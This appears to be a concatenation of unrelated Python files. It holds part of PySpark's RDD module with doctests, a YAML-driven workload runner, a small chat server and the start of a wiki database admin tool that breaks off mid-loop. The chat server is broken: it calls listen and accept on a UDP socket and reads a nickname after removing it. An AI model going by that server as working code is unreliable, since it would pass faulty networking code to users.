>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec, self.ctx.pythonVer,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
workload.py
|
import datetime
import threading
import yaml
from .session_group import SessionGroup
class Workload:
def __init__(self, session_cls, config_filename, *args):
with open(config_filename) as config_file:
config = yaml.safe_load(config_file)
now = datetime.datetime.now()
self._session_groups = [
SessionGroup(session_cls, args,
config_filename=sg_spec["sessionConfig"],
no_concurrent_sessions=sg_spec["noConcurrentSessions"],
ramp_up_duration=datetime.timedelta(
seconds=sg_spec["rampUpDuration"]),
ramp_down_duration=datetime.timedelta(
seconds=sg_spec["rampDownDuration"]),
start_at=now + datetime.timedelta(seconds=sg_spec["startTime"]),
stop_at=now + datetime.timedelta(seconds=sg_spec["endTime"]),
burstiness=[{"speed_up_factor": burst_spec["speedUpFactor"],
"start_at": now + \
datetime.timedelta(seconds=burst_spec["startTime"]),
"stop_at": now + \
datetime.timedelta(seconds=burst_spec["endTime"])}
for burst_spec in sg_spec.get("burstiness", [])])
for sg_spec in config]
def start(self):
threads = [threading.Thread(target=sg.start) for sg in self._session_groups]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
simple_server.py
|
import threading
import socket
host = socket.gethostbyname(socket.gethostname())
port = 9090
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.bind((host,port))
s.listen(5)
clients = []
nicknames = []
def trans(mess):
for client in clients:
client.send(mess)
def handle_connection(client):
quit = False
print("[ Server Started ]")
while not quit:
try:
message = client.recv(1024)
trans(message)
except:
index = clients.index(client)
clients.remove(client)
nicknames.remove(nicknames[index])
trans(f"{nicknames[index]} left the chat.".encode('utf-8'))
quit = True
def main():
print("SERVER POSHOLLL...")
while True:
client, addr = s.accept()
print(f"Connected to {addr}")
client.send("NICK".encode('utf-8'))
nickname = client.recv(1024).decode('utf-8')
nicknames.append(nickname)
clients.append(client)
print(f"Nick is {nickname}")
trans(f"{nickname} joined the chat.".encode('utf-8'))
client.send("You are now connected".encode('utf-8'))
thread = threading.Thread(target= handle_connection, args=(client,))
thread.start()
if __name__ == '__main__':
main()
|
emergency_tool.py
|
from route.tool.func import *
from route.tool.mark import load_conn2, namumark
try:
set_data = json.loads(open('data/set.json').read())
except:
if os.getenv('NAMU_DB') != None:
set_data = { "db" : os.getenv('NAMU_DB') }
else:
print('DB name (data) : ', end = '')
new_json = str(input())
if new_json == '':
new_json = 'data'
with open('data/set.json', 'w') as f:
f.write('{ "db" : "' + new_json + '" }')
set_data = json.loads(open('data/set.json').read())
print('DB name : ' + set_data['db'])
db_name = set_data['db']
conn = sqlite3.connect(db_name + '.db', check_same_thread = False)
curs = conn.cursor()
load_conn(conn)
print('----')
print('1. Backlink reset')
print('2. reCAPTCHA delete')
print('3. Ban delete')
print('4. Change host')
print('5. Change port')
print('6. Change skin')
print('7. Change password')
print('8. Reset version')
print('9. New DB create')
print('10. Delete set.json')
print('----')
print('Select : ', end = '')
what_i_do = input()
if what_i_do == '1':
def parser(data):
namumark(data[0], data[1], 1)
curs.execute("delete from back")
conn.commit()
curs.execute("select title, data from data")
data = curs.fetchall()
num = 0
for test in data:
num += 1
